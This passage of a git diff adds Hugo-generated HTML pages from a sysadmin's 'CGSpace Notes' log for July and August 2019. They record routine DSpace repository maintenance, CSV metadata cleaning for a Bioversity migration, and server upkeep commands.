+</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
+$ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
+</code></pre><ul>
+<li>Send and merge a pull request for the new ORCID identifiers (<a href="https://github.com/ilri/DSpace/pull/428">#428</a>)</li>
+<li>I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the databse:</li>
+</ul>
+<pre tabindex="0"><code>cg.creator.id,correct
+&#34;Marius Ekué: 0000-0002-5829-6321&#34;,&#34;Marius R.M. Ekué: 0000-0002-5829-6321&#34;
+&#34;Mwungu: 0000-0001-6181-8445&#34;,&#34;Chris Miyinzi Mwungu: 0000-0001-6181-8445&#34;
+&#34;Mwungu: 0000-0003-1658-287X&#34;,&#34;Chris Miyinzi Mwungu: 0000-0003-1658-287X&#34;
+</code></pre><ul>
+<li>But when I ran <code>fix-metadata-values.py</code> I didn&rsquo;t see any changes:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
+</code></pre><h2 id="2019-07-06">2019-07-06</h2>
+<ul>
+<li>Send a reminder to Marie about my notes on the <a href="https://github.com/AgriculturalSemantics/cg-core/issues/2">CG Core v2 issue I created two weeks ago</a></li>
+</ul>
+<h2 id="2019-07-08">2019-07-08</h2>
+<ul>
+<li>Communicate with Atmire about the Solr statistics cores issue
+<ul>
+<li>I suspect we might need to get more disk space on DSpace Test so we can try to replicate the production environment more closely</li>
+</ul>
+</li>
+<li>Meeting with AgroKnow and CTA about their new ICT Update story telling thing
+<ul>
+<li>AgroKnow has developed a React application to display tag clouds based on harvesting metadata and full text from CGSpace items</li>
+<li>We discussed how to host it technically, perhaps we purchase a server to run it on and just give AgroKnow guys access</li>
+</ul>
+</li>
+<li>Playing with the idea of using <a href="https://github.com/BurntSushi/xsv">xsv</a> to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:</li>
+</ul>
+<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
+field,value,count
+cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
+$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;         
+field,value,count
+dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
+</code></pre><ul>
+<li>Or perhaps if DOIs are valid or not (having doi.org in the URL):</li>
+</ul>
+<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;doi.org&#39;
+field,value,count
+cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
+</code></pre><ul>
+<li>Or perhaps items with invalid ISSNs (according to the <a href="https://en.wikipedia.org/wiki/International_Standard_Serial_Number#Code_format">ISSN code format</a>):</li>
+</ul>
+<pre tabindex="0"><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v &#39;&#34;&#39; | grep -v -E &#39;^[0-9]{4}-[0-9]{3}[0-9xX]$&#39;
+dc.identifier.issn
+978-3-319-71997-9
+978-3-319-71997-9
+978-3-319-71997-9
+978-3-319-58789-9
+2320-7035 
+ 2593-9173
+</code></pre><h2 id="2019-07-09">2019-07-09</h2>
+<ul>
+<li>Thinking about data cleaning automation again and found some resources about Python and Pandas:
+<ul>
+<li><a href="https://realpython.com/python-data-cleaning-numpy-pandas/">https://realpython.com/python-data-cleaning-numpy-pandas/</a></li>
+<li><a href="https://mode.com/blog/python-data-cleaning-libraries">https://mode.com/blog/python-data-cleaning-libraries</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-07-11">2019-07-11</h2>
+<ul>
+<li>Skype call with Marie Angelique about CG Core v2
+<ul>
+<li>We discussed my comments and suggestions from last week</li>
+<li>One comment she had was that we should try to move our center-specific subjects into <code>DCTERMS.subject</code> and normalize them against AGROVOC</li>
+<li>I updated my <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">gist about CGSpace metadata changes</a></li>
+</ul>
+</li>
+<li>Skype call with Jane Poole to discuss OpenRXV/AReS Phase II TORs
+<ul>
+<li>I need to follow up with Moayad about the reporting functionality</li>
+<li>Also, I need to email Harrison my notes on the CG Core v2 stuff</li>
+<li>Also, Jane asked me to check the Data Portal to see which email address requests for confidential data are going</li>
+</ul>
+</li>
+<li>Yesterday Theirry from CTA asked me about an error he was getting while submitting an item on CGSpace: &ldquo;Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission.&rdquo;</li>
+<li>I looked in the DSpace logs and found this right around the time of the screenshot he sent me:</li>
+</ul>
+<pre tabindex="0"><code>2019-07-10 11:50:27,433 INFO  org.dspace.submit.step.CompleteStep @ lewyllie@cta.int:session_id=A920730003BCAECE8A3B31DCDE11A97E:submission_complete:Completed submission with id=106658
+</code></pre><ul>
+<li>I&rsquo;m assuming something happened in his browser (like a refresh) after the item was submitted&hellip;</li>
+</ul>
+<h2 id="2019-07-12">2019-07-12</h2>
+<ul>
+<li>Atmire responded with some initial feedback about our Tomcat configuration related to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">Solr issue I raised recently</a>
+<ul>
+<li>Unfortunately there is no concrete feedback yet</li>
+<li>I think we need to upgrade our DSpace Test server so we can fit all the Solr cores&hellip;</li>
+<li>Actually, I looked and there were over 40 GB free on DSpace Test so I copied the Solr statistics cores for the years 2017 to 2010 from CGSpace to DSpace Test because they weren&rsquo;t actually very large</li>
+<li>I re-deployed DSpace for good measure, and I think all Solr cores are loading&hellip; I will do more tests later</li>
+</ul>
+</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+<li>Try to run <code>dspace cleanup -v</code> on CGSpace and ran into an error:</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(167394) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code># su - postgres
+$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);&#39;
+UPDATE 1
+</code></pre><h2 id="2019-07-16">2019-07-16</h2>
+<ul>
+<li>Completely reset the Podman configuration on my laptop because there were some layers that I couldn&rsquo;t delete and it had been some time since I did a cleanup:</li>
+</ul>
+<pre tabindex="0"><code>$ podman system prune -a -f --volumes
+$ sudo rm -rf ~/.local/share/containers
+</code></pre><ul>
+<li>Then pull a new PostgreSQL 9.6 image and load a CGSpace database dump into a new local test container:</li>
+</ul>
+<pre tabindex="0"><code>$ podman pull postgres:9.6-alpine
+$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;                     
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+</code></pre><ul>
+<li>Start working on implementing the <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">CG Core v2 changes</a> on my local DSpace test environment</li>
+<li>Make a pull request to CG Core v2 with some fixes for typos in the specification (<a href="https://github.com/AgriculturalSemantics/cg-core/pull/5">#5</a>)</li>
+</ul>
+<h2 id="2019-07-18">2019-07-18</h2>
+<ul>
+<li>Talk to Moayad about the remaining issues for OpenRXV / AReS
+<ul>
+<li>He sent a pull request with some changes for the bar chart and documentation about configuration, and said he&rsquo;d finish the export feature next week</li>
+</ul>
+</li>
+<li>Sisay said a user was having problems registering on CGSpace and it looks like the email account expired again:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace test-email
+
+About to send test email:
+ - To: blahh@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+</code></pre><ul>
+<li>I emailed ICT to ask them to reset it and make the expiration period longer if possible</li>
+</ul>
+<h2 id="2019-07-19">2019-07-19</h2>
+<ul>
+<li>ICT reset the password for the CGSpace support account and apparently removed the expiry requirement
+<ul>
+<li>I tested the account and it&rsquo;s working</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-07-20">2019-07-20</h2>
+<ul>
+<li>Create an account for Lionelle Samnick on CGSpace because the registration isn&rsquo;t working for some reason:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password &#39;blah&#39;
+</code></pre><ul>
+<li>I added her as a submitter to <a href="https://cgspace.cgiar.org/handle/10568/74536">CTA ISF Pro-Agro series</a></li>
+<li>Start looking at 1429 records for the Bioversity batch import
+<ul>
+<li>Multiple authors should be specified with multi-value separatator (||) instead of ;</li>
+<li>We don&rsquo;t use &ldquo;(eds)&rdquo; as an author</li>
+<li>Same issue with dc.publisher using &ldquo;;&rdquo; for multiple values</li>
+<li>Some invalid ISSNs in dc.identifier.issn (they look like ISBNs)</li>
+<li>I see some ISSNs in the dc.identifier.isbn field</li>
+<li>I see some invalid ISBNs that look like Excel errors (9,78E+12)</li>
+<li>For DOI we just use the URL, not &ldquo;DOI: <a href="https://doi.org">https://doi.org</a>&hellip;&rdquo;</li>
+<li>I see an invalid &ldquo;LEAVE BLANK&rdquo; in the cg.contributor.crp field</li>
+<li>Country field is using &ldquo;,&rdquo; for multiple values instead of &ldquo;||&rdquo;</li>
+<li>Region field is using &ldquo;,&rdquo; for multiple values instead of &ldquo;||&rdquo;</li>
+<li>Language field should be lowercase like &ldquo;en&rdquo;, and it is using the wrong multiple value separator, and has some invalid values</li>
+<li>What is the cg.identifier.url2 field? You should probably add those as cg.link.reference</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-07-22">2019-07-22</h2>
+<ul>
+<li>Raise an <a href="https://github.com/AgriculturalSemantics/cg-core/issues/8">issue on CG Core v2 spec regarding country and region coverage</a>
+<ul>
+<li>The current standard has them implemented as a class like this:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>    &lt;dct:coverage&gt;
+        &lt;dct:spatial&gt;
+            &lt;type&gt;Country&lt;/type&gt;
+            &lt;dct:identifier&gt;http://sws.geonames.org/192950&lt;/dct:identifier&gt;
+            &lt;rdfs:label&gt;Kenya&lt;/rdfs:label&gt;
+        &lt;/dct:spatial&gt;
+    &lt;/dct:coverage&gt;
+</code></pre><ul>
+<li>I left a note saying that DSpace is technically limited to a flat schema so we use <code>cg.coverage.country: Kenya</code></li>
+<li>Do a little more work on CG Core v2 in the input forms</li>
+</ul>
+<h2 id="2019-07-25">2019-07-25</h2>
+<ul>
+<li>
+<p>Generate a list of the ORCID identifiers that we added to CGSpace in 2019 for Sara Jani at ICARDA</p>
+</li>
+<li>
+<p>Bioversity sent a new file for their migration to CGSpace</p>
+<ul>
+<li>There is always a blank row and blank column at the end</li>
+<li>One invalid type (Brie)</li>
+<li>824 items with leading/trailing spaces in dc.identifier.citation</li>
+<li>175 items with a trailing comma in dc.identifier.citation (using custom text facet with GREL <code>value.endsWith(',').toString()</code>)</li>
+<li>Fix them with GREL transform: <code>value.replace(/,$/, '')</code></li>
+<li>A few strange publishers after splitting multi-value cells, like &ldquo;(Belgium)&rdquo;</li>
+<li>Deleted four ISSNs that are actually ISBNs and are already present in the ISBN field</li>
+<li>Eight invalid ISBNs</li>
+<li>Convert all DOIs to &ldquo;<a href="https://doi.org">https://doi.org</a>&rdquo; format and fix one invalid DOI</li>
+<li>Fix a handful of incorrect CRPs that seem to have been split on comma &ldquo;,&rdquo;</li>
+<li>Lots of strange values in cg.link.reference, and I normalized all DOIs to <a href="https://doi.org">https://doi.org</a> format
+<ul>
+<li>There are lots of invalid links here, like &ldquo;36&rdquo; and &ldquo;recordlink:publications:2606&rdquo; and &ldquo;t3://record?identifier=publications&amp;uid=2606&rdquo;</li>
+<li>Also there are hundreds of items that use the same value for cg.link.reference AND cg.link.dataurl</li>
+</ul>
+</li>
+<li>Use https:// for all Bioversity links (reference, data url, permalink)</li>
+</ul>
+</li>
+<li>
+<p>I might be able to use <a href="https://pypi.org/project/isbnlib/">isbnlib</a> to validate ISBNs in Python:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>if isbnlib.is_isbn10(&#39;9966-955-07-0&#39;) or isbnlib.is_isbn13(&#39;9966-955-07-0&#39;):
+    print(&#34;Yes&#34;)
+else:
+    print(&#34;No&#34;)
+</code></pre><ul>
+<li>Or with <a href="https://github.com/arthurdejong/python-stdnum">python-stdnum</a>:</li>
+</ul>
+<pre tabindex="0"><code>from stdnum import isbn
+from stdnum import issn
+
+isbn.validate(&#39;978-92-9043-389-7&#39;)
+issn.validate(&#39;1020-3362&#39;)
+</code></pre><h2 id="2019-07-26">2019-07-26</h2>
+<ul>
+<li>
+<p>Bioversity sent me an updated CSV file that fixes some of the issues I pointed out yesterday</p>
+<ul>
+<li>There are still 1429 records</li>
+<li>There are still one extra row and one extra column</li>
+<li>There are still eight invalid ISBNs (according to my <code>validate.py</code> script)</li>
+</ul>
+</li>
+<li>
+<p>I figured out a GREL to trim spaces in multi-value cells without splitting them:</p>
+</li>
+</ul>
+<pre tabindex="0"><code>value.replace(/\s+\|\|/,&#34;||&#34;).replace(/\|\|\s+/,&#34;||&#34;)
+</code></pre><ul>
+<li>I whipped up a quick script using Python Pandas to do whitespace cleanup</li>
+</ul>
+<h2 id="2019-07-29">2019-07-29</h2>
+<ul>
+<li>I turned the Pandas script into a proper Python package called <a href="https://git.sr.ht/~alanorth/csv-metadata-quality">csv-metadata-quality</a>
+<ul>
+<li>It supports CSV and Excel files</li>
+<li>It fixes whitespace errors and erroneous multi-value separators (&quot;|&quot;) and validates ISSN, ISBNs, and dates</li>
+<li>Also I added a bunch of other checks/fixes for unnecessary and &ldquo;suspicious&rdquo; Unicode characters</li>
+<li>I added fixes to drop duplicate metadata values</li>
+<li>And lastly, I added validation of ISO 639-2 and ISO 639-3 languages</li>
+<li>And lastly lastly, I added AGROVOC validation of subject terms</li>
+</ul>
+</li>
+<li>Inform Bioversity that there is an error in their CSV, seemingly caused by quotes in the citation field</li>
+</ul>
+<h2 id="2019-07-30">2019-07-30</h2>
+<ul>
+<li>Add support for removing newlines (line feeds) to <a href="https://git.sr.ht/~alanorth/csv-metadata-quality">csv-metadata-quality</a></li>
+<li>On the subject of validating some of our fields like countries and regions, Abenet pointed out that these should all be valid AGROVOC terms, so we can actually try to validate against that!</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-08/index.html b/docs/2019-08/index.html
new file mode 100644
index 000000000..360a54bda
--- /dev/null
+++ b/docs/2019-08/index.html
@@ -0,0 +1,627 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="August, 2019" />
+<meta property="og:description" content="2019-08-03
+
+Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;
+
+2019-08-04
+
+Deploy ORCID identifier updates requested by Bioversity to CGSpace
+Run system updates on CGSpace (linode18) and reboot it
+
+Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;
+After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.
+
+
+Run system updates on DSpace Test (linode19) and reboot it
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-08/" />
+<meta property="article:published_time" content="2019-08-03T12:39:51+03:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="August, 2019"/>
+<meta name="twitter:description" content="2019-08-03
+
+Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;
+
+2019-08-04
+
+Deploy ORCID identifier updates requested by Bioversity to CGSpace
+Run system updates on CGSpace (linode18) and reboot it
+
+Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;
+After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.
+
+
+Run system updates on DSpace Test (linode19) and reboot it
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "August, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-08/",
+  "wordCount": "2703",
+  "datePublished": "2019-08-03T12:39:51+03:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-08/">
+
+    <title>August, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-08/">August, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-08-03T12:39:51+03:00">Sat Aug 03, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-08-03">2019-08-03</h2>
+<ul>
+<li>Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;</li>
+</ul>
+<h2 id="2019-08-04">2019-08-04</h2>
+<ul>
+<li>Deploy ORCID identifier updates requested by Bioversity to CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it
+<ul>
+<li>Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;</li>
+<li>After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.</li>
+</ul>
+</li>
+<li>Run system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+<h2 id="2019-08-05">2019-08-05</h2>
+<ul>
+<li>Update Tomcat to 7.0.96 in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
+<li>Update PostgreSQL JDBC driver to 42.2.6 in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastrucutre playbooks</a></li>
+<li>Deploy both on DSpace Test (linode19)</li>
+<li>Looking at the 1429 records for Bioversity migration again
+<ul>
+<li>The following items use the same exact PDF and seem to be duplicates:
+<ul>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=10191">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=10191</a></li>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=342">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=342</a></li>
+</ul>
+</li>
+<li>The following items use the same exact PDF, but one seems to be incorrect:
+<ul>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=5347">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=5347</a></li>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=5340">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=5340</a></li>
+</ul>
+</li>
+<li>The following PDFs are used by several items incorrectly:
+<ul>
+<li><code>Report_of_a_Working_Group_on_Allium_7.pdf</code></li>
+<li><code>Report_of_a_Working_Group_on_Allium_Fourth_meeting_1696.pdf</code></li>
+</ul>
+</li>
+<li>I checked the SHA1 hashes of each PDF and found that some appear more than once&hellip;</li>
+<li>The following items use the same PDF with a different name, but seem to be duplicates (pick one?):
+<ul>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=433">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=433</a></li>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=10189">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=10189</a></li>
+</ul>
+</li>
+<li>The following items use the same PDF with a different name, but seem to be duplicates (pick one?):
+<ul>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=332">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=332</a></li>
+<li><a href="https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1%5Bnews%5D=10187">https://www.bioversityinternational.org/index.php?id=244&amp;tx_news_pi1[news]=10187</a></li>
+</ul>
+</li>
+<li>There are about thirty PDFs that have French or Spanish filenames and there seems to be an encoding issue
+<ul>
+<li>I asked Francesco if he can give me a PDF URL column instead of a &ldquo;filename&rdquo; column so I can download the files myself</li>
+<li>At <em>least</em> the ~50 filenames identified by the following GREL will have issues:</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/^.*’.*$/)),
+  isNotNull(value.match(/^.*é.*$/)),
+  isNotNull(value.match(/^.*á.*$/)),
+  isNotNull(value.match(/^.*è.*$/)),
+  isNotNull(value.match(/^.*í.*$/)),
+  isNotNull(value.match(/^.*ó.*$/)),
+  isNotNull(value.match(/^.*ú.*$/)),
+  isNotNull(value.match(/^.*à.*$/)),
+  isNotNull(value.match(/^.*û.*$/))
+).toString()
+</code></pre><ul>
+<li>I tried to extract the filenames and construct a URL to download the PDFs with my <code>generate-thumbnails.py</code> script, but there seem to be several paths for PDFs so I can&rsquo;t guess it properly</li>
+<li>I will have to wait for Francesco to respond about the PDFs, or perhaps proceed with a metadata-only upload so we can do other checks on DSpace Test</li>
+</ul>
+<h2 id="2019-08-06">2019-08-06</h2>
+<ul>
+<li>Francesca responded to address my feedback yesterday
+<ul>
+<li>I made some changes to the CSV based on her feedback (remove two duplicates, change one PDF file name, change two titles)</li>
+<li>Then I found some items that have PDFs in multiple languages that only list one language in <code>dc.language.iso</code> so I changed them</li>
+<li>Strangley, one item was referring to a 7zip file&hellip;</li>
+<li>After removing the two duplicates there are now 1427 records</li>
+<li>Fix one invalid ISSN: 1020-2002→1020-3362</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-08-07">2019-08-07</h2>
+<ul>
+<li>Daniel Haile-Michael asked about using a logical OR with the DSpace OpenSearch, but I looked in the DSpace manual and it does not seem to be possible</li>
+</ul>
+<h2 id="2019-08-08">2019-08-08</h2>
+<ul>
+<li>Moayad noticed that the HTTPS certificate expired on the AReS dev server (linode20)
+<ul>
+<li>The first problem was that there is a Docker container listening on port 80, so it conflicts with the ACME http-01 validation</li>
+<li>The second problem was that we only allow access to port 80 from localhost</li>
+<li>I adjusted the <code>renew-letsencrypt</code> systemd service so it stops/starts the Docker container and firewall:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># /opt/certbot-auto renew --standalone --pre-hook &#34;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&#34; --post-hook &#34;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&#34;
+</code></pre><ul>
+<li>It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains</li>
+<li>Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04&rsquo;s <a href="https://ssl-config.mozilla.org/#server=nginx&amp;server-version=1.16.0&amp;config=intermediate&amp;openssl-version=1.1.0g&amp;hsts=false&amp;ocsp=false">OpenSSL 1.1.0g with nginx 1.16.0</a></li>
+<li>Run all system updates on AReS dev server (linode20) and reboot it</li>
+<li>Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:</li>
+</ul>
+<pre tabindex="0"><code>$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
+$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
+$ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
+$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs2.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
+$ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
+</code></pre><ul>
+<li>
+<p>(the weird sed regex removes color codes, because my generate-thumbnails script prints pretty colors)</p>
+</li>
+<li>
+<p>Some PDFs are uploaded in different paths so I have to try a few times to get them all:</p>
+<ul>
+<li><code>/fileadmin/_migrated/uploads/tx_news/</code></li>
+<li><code>/fileadmin/user_upload/online_library/publications/pdfs/</code></li>
+<li><code>/fileadmin/user_upload/</code></li>
+</ul>
+</li>
+<li>
+<p>Even so, there are still 52 items with incorrect filenames, so I can&rsquo;t derive their PDF URLs&hellip;</p>
+<ul>
